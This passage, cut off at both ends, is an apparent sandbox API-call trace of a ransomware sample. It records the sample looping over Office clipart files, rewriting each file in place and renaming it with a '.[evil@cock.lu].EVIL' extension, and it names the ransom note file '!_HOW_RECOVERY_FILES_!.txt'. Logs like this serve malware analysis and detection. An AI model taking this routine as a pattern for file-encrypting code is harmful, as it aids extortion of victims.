office\\root\\clipart\\pub60cor\\j0105912.wmf.[evil@cock.lu].evil")) returned 1 [0139.284] ??_V@YAXPEAX@Z () returned 0x1 [0139.287] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF", dwFileAttributes=0x200) returned 0 [0139.287] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.287] wcsstr (_Str="J0105974.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.287] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF") returned 69 [0139.287] wcscmp (_String1="J0105974.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.287] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105974.WMF") returned 0x0 [0139.287] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF") returned 0x45 [0139.287] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105974.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.289] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1204, lpOverlapped=0x0) returned 1 [0139.301] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.301] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.301] _errno () returned 0x84b1160840 [0139.301] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.301] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1220, lpOverlapped=0x0) returned 1 [0139.301] CloseHandle (hObject=0x1a8) returned 1 [0139.301] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.302] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.302] __uncaught_exception () returned 0x84b1160800 [0139.302] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.302] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105974.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105974.wmf.[evil@cock.lu].evil")) returned 1 [0139.303] ??_V@YAXPEAX@Z () returned 0x1 [0139.305] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF", dwFileAttributes=0x200) returned 0 [0139.305] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.305] wcsstr (_Str="J0106020.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.306] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF") returned 69 [0139.306] wcscmp (_String1="J0106020.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.306] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0106020.WMF") returned 0x0 [0139.306] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF") returned 0x45 [0139.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106020.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.307] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x274c, lpOverlapped=0x0) returned 1 [0139.315] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.315] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.315] _errno () returned 0x84b1160840 [0139.315] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.315] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x2760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2760, lpOverlapped=0x0) returned 1 [0139.315] CloseHandle (hObject=0x1a8) returned 1 [0139.315] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.315] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.315] __uncaught_exception () returned 0x84b1160800 [0139.315] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.316] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106020.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106020.wmf.[evil@cock.lu].evil")) returned 1 [0139.316] ??_V@YAXPEAX@Z () returned 0x1 [0139.319] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF", dwFileAttributes=0x200) returned 0 [0139.319] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.319] wcsstr (_Str="J0106124.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.319] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF") returned 69 [0139.319] wcscmp (_String1="J0106124.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.319] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0106124.WMF") returned 0x0 [0139.319] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF") returned 0x45 [0139.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106124.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.321] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16b4, lpOverlapped=0x0) returned 1 [0139.330] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.330] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.330] _errno () returned 0x84b1160840 [0139.330] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.330] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16c0, lpOverlapped=0x0) returned 1 [0139.330] CloseHandle (hObject=0x1a8) returned 1 [0140.633] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.633] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.633] __uncaught_exception () returned 0x84b1160800 [0140.633] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.633] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106124.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106124.wmf.[evil@cock.lu].evil")) returned 1 [0140.634] ??_V@YAXPEAX@Z () returned 0x1 [0140.637] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF", dwFileAttributes=0x200) returned 0 [0140.637] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.637] wcsstr (_Str="J0106146.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.637] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 69 [0140.637] wcscmp (_String1="J0106146.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.637] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0106146.WMF") returned 0x0 [0140.637] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 0x45 [0140.637] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.639] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5bfc, lpOverlapped=0x0) returned 1 [0140.712] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.712] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.712] _errno () returned 0x84b1160840 [0140.712] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.712] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c00, lpOverlapped=0x0) returned 1 [0140.712] CloseHandle (hObject=0x1a8) returned 1 [0140.712] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.712] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.712] __uncaught_exception () returned 0x84b1160800 [0140.713] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.713] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf.[evil@cock.lu].evil")) returned 1 [0140.713] ??_V@YAXPEAX@Z () returned 0x1 [0140.716] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF", dwFileAttributes=0x200) returned 0 [0140.716] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.716] wcsstr (_Str="J0106208.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.716] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 69 [0140.716] wcscmp (_String1="J0106208.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.716] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0106208.WMF") returned 0x0 [0140.717] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 0x45 [0140.717] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.718] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2e7c, lpOverlapped=0x0) returned 1 [0140.721] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.721] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.721] _errno () returned 0x84b1160840 [0140.721] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.721] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2e80, lpOverlapped=0x0) returned 1 [0140.721] CloseHandle (hObject=0x1a8) returned 1 [0140.721] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.722] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.722] __uncaught_exception () returned 0x84b1160800 [0140.722] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.722] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf.[evil@cock.lu].evil")) returned 1 [0140.723] ??_V@YAXPEAX@Z () returned 0x1 [0140.725] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF", dwFileAttributes=0x200) returned 0 [0140.726] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.736] wcsstr (_Str="J0106222.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.736] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 69 [0140.736] wcscmp (_String1="J0106222.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.736] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0106222.WMF") returned 0x0 [0140.736] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 0x45 [0140.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.738] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4c90, lpOverlapped=0x0) returned 1 [0140.752] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.752] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.752] _errno () returned 0x84b1160840 [0140.752] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.752] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ca0, lpOverlapped=0x0) returned 1 [0140.752] CloseHandle (hObject=0x1a8) returned 1 [0140.753] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.753] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.753] __uncaught_exception () returned 0x84b1160800 [0140.753] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.753] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf.[evil@cock.lu].evil")) returned 1 [0140.754] ??_V@YAXPEAX@Z () returned 0x1 [0140.757] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF", dwFileAttributes=0x200) returned 0 [0140.757] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.757] wcsstr (_Str="J0106572.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.757] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 69 [0140.757] wcscmp (_String1="J0106572.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.757] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0106572.WMF") returned 0x0 [0140.757] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 0x45 [0140.757] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.759] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x864, lpOverlapped=0x0) returned 1 [0140.786] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.786] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.786] _errno () returned 0x84b1160840 [0140.786] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.786] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x880, lpOverlapped=0x0) returned 1 [0140.786] CloseHandle (hObject=0x1a8) returned 1 [0140.786] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.786] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.786] __uncaught_exception () returned 0x84b1160800 [0140.786] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.787] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf.[evil@cock.lu].evil")) returned 1 [0140.788] ??_V@YAXPEAX@Z () returned 0x1 [0140.791] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF", dwFileAttributes=0x200) returned 0 [0140.791] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.791] wcsstr (_Str="J0106816.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.791] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 69 [0140.791] wcscmp (_String1="J0106816.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.791] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0106816.WMF") returned 0x0 [0140.791] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 0x45 [0140.791] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.793] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd04, lpOverlapped=0x0) returned 1 [0140.826] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.826] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.826] _errno () returned 0x84b1160840 [0140.826] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.826] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd20, lpOverlapped=0x0) returned 1 [0140.826] CloseHandle (hObject=0x1a8) returned 1 [0140.826] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.827] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.827] __uncaught_exception () returned 0x84b1160800 [0140.827] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.827] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf.[evil@cock.lu].evil")) returned 1 [0140.828] ??_V@YAXPEAX@Z () returned 0x1 [0140.830] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF", dwFileAttributes=0x200) returned 0 [0140.830] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.830] wcsstr (_Str="J0106958.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.830] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: 